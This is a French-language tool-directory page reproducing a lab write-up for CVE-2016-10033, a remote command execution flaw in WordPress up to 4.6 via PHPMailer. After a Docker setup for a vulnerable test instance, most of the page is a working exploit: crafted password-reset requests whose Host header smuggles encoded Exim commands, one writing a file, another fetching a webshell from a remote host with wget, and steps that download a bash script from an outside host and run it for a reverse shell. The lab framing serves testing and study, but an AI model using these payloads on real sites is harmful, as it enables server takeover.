Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
WP-CVE-2016-10033 | Kitploit
Outils/GitHubGitHub/liusec/wp-cve-2016-10033
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionDéveloppement de Charges UtilesLabs et Pratique
GitHubliusec/wp-cve-2016-10033

WP-CVE-2016-10033

Voir le dépôt
1il y a 9 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

WordPress <= 4.6 - Vulnérabilité d'exécution de commandes (PHPMailer) (CVE-2016-10033)

Informations sur la vulnérabilité

WordPress est une plateforme de blogs développée en PHP. Les utilisateurs peuvent créer leur propre site sur un serveur prenant en charge PHP et la base de données MySQL. WordPress peut également être utilisé comme système de gestion de contenu (CMS). WordPress utilise le composant PHPMailer pour envoyer des e-mails aux utilisateurs. PHPMailer (versions < 5.2.18) présente une vulnérabilité d'exécution de commandes à distance. Un attaquant n'a qu'à construire astucieusement une adresse e-mail malveillante pour écrire des fichiers arbitraires, entraînant une exécution de commandes à distance.

Versions affectées

WordPress <= 4.6

Informations sur l'image

TypeNom d'utilisateurMot de passe
Mysqlrootroot
/wp-admin/adminadmin123

Obtenir l'environnement :

  1. Télécharger l'image localement
root@kitploit:~
$ docker pull medicean/vulapps:w_wordpress_6
  1. Démarrer l'environnement
root@kitploit:~
$ docker run -d -p 8000:80 medicean/vulapps:w_wordpress_6

-p 8000:80 Le 8000 devant représente le port de la machine physique, il peut être spécifié librement.

Accédez à http://127.0.0.1:8000 ; si vous voyez l'interface principale de WordPress, le démarrage a réussi.

POC

Supposons que l'adresse cible soit : http://127.0.0.1:8000/

  1. Copiez la requête HTTP ci-dessous dans BurpSuite Repeater, cliquez sur le bouton Go, renseignez l'IP cible et le port (par exemple, IP : 127.0.0.1, port : 80)
root@kitploit:~
POST /wp-login.php?action=lostpassword HTTP/1.1
Host: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}var${substr{0}{1}{$spool_directory}}www${substr{0}{1}{$spool_directory}}html${substr{0}{1}{$spool_directory}}vuln}} null)
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: */*
Content-Length: 56
Content-Type: application/x-www-form-urlencoded

wp-submit=Get+New+Password&redirect_to=&user_login=admin
  1. Accédez à : http://127.0.0.1:8000/vuln

Un code de statut 200 en retour signifie que le fichier /var/www/html/vuln a été créé avec succès.

Vous pouvez accéder à cette adresse avant d'envoyer la requête : vous obtiendrez alors une erreur 404.

Exploit

Idée : créer un fichier texte sur un serveur HTTP distant et le télécharger sur la machine cible via wget.

Écrire une WebShell sur la cible (fortement déconseillé)

Si vous pouvez déjà exécuter des commandes, pourquoi envoyer une WebShell ?

  1. Exécutez la commande suivante :
root@kitploit:~
/usr/bin/wget --output-document /var/www/html/webshell.php raw.githubusercontent.com/medicean/vulapps/master/w/wordpress/6/webshell.php

Remarque :

  1. L'URL distante ne doit pas contenir http://
  2. Toutes les lettres doivent être en minuscules
  3. Tous les / doivent être remplacés par ${substr{0}{1}{$spool_directory}}
  4. Tous les espaces doivent être remplacés par ${substr{10}{1}{$tod_log}}

La requête HTTP est la suivante (remplacez user_login selon les besoins ; la valeur par défaut est admin) :

root@kitploit:~
POST /wp-login.php?action=lostpassword HTTP/1.1
Host: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}usr${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}wget${substr{10}{1}{$tod_log}}--output-document${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}var${substr{0}{1}{$spool_directory}}www${substr{0}{1}{$spool_directory}}html${substr{0}{1}{$spool_directory}}webshell.php${substr{10}{1}{$tod_log}}raw.githubusercontent.com${substr{0}{1}{$spool_directory}}medicean${substr{0}{1}{$spool_directory}}vulapps${substr{0}{1}{$spool_directory}}master${substr{0}{1}{$spool_directory}}w${substr{0}{1}{$spool_directory}}wordpress${substr{0}{1}{$spool_directory}}6${substr{0}{1}{$spool_directory}}webshell.php}} null)
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: */*
Content-Length: 56
Content-Type: application/x-www-form-urlencoded

wp-submit=Get+New+Password&redirect_to=&user_login=admin
  1. Accédez à http://127.0.0.1:8000/webshell.php

Shell inversé (recommandé)

Si le contenu du fichier texte distant est un script bash, une fois téléchargé sur la cible, vous pouvez exécuter directement le fichier avec /bin/bash.

  1. Téléchargez le script bash sur la cible
root@kitploit:~
/usr/bin/wget --output-document /tmp/rce example.com/1.txt
  1. Exécutez
root@kitploit:~
/bin/bash /tmp/rce

Liens associés

  • WordPress Core 4.6 - Unauthenticated Remote Code Execution (RCE) PoC Exploit
Télécharger l’outil